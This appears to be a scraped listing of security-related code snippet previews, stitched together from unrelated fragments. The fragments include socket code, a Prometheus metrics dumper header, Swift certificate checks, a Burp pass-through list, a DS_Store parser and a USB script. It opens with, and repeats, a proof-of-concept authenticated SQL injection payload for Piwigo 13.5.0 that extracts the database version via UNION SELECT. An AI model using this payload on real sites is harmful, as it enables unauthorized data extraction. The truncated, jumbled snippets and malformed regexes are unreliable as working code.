POC - Authenticated SQL injection Piwigo 13.5.0
Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --
import osproc, net | |
#Author: m4ll3k | |
var | |
sock = newSocket() | |
proc run(TARGET: string, RPORT: int): void = | |
try: | |
sock.connect(TARGET, PORT(RPORT)) |
#include <netdb.h> | |
/* --- server.c --- */ | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <errno.h> | |
#include <string.h> |
=begin | |
author: unp4ck | |
usage: | |
$ gem install http | |
$ ruby metricsDumper.rb -u https://example.com/prometheus | |
=end |
func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) { | |
if (challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust) { | |
if let serverTrust = challenge.protectionSpace.serverTrust { | |
var secresult = SecTrustResultType.invalid | |
let status = SecTrustEvaluate(serverTrust, &secresult) | |
if (errSecSuccess == status) { | |
if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0) { | |
let serverCertificateData = SecCertificateCopyData(serverCertificate) | |
let data = CFDataGetBytePtr(serverCertificateData); |
POC - Authenticated SQL injection Piwigo 13.5.0
Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --
Burp Suite > Proxy > Options > TLS Pass Through. | |
Add these: | |
*.google\.com | |
.*.gstatic).com | |
*.mozilla\.com | |
.*\.googleapis\.com | |
*.pkil.goog |
# -*- encoding: utf-8 -*- | |
from ds_store import DSStore | |
from tqdm import tqdm | |
import argparse | |
parser = argparse.ArgumentParser() | |
parser.add_argument("-p", "--path", help="Path to the DS_Store file", required=True) | |
parser.add_argument("-t", "--type", help="Type : Iloc, bwsp, lsvp, lsvP, icvp", default='Iloc') | |
args = parser.parse_args() |
#!/bin/bash | |
# Function to select the USB device | |
select_usb_device() { | |
echo "Available USB devices:" | |
local devices=(/dev/sd*) | |
select usb_device in "${devices[@]}"; do | |
if [ -z "$usb_device" ]; then | |
echo "Invalid selection, please try again." | |
else |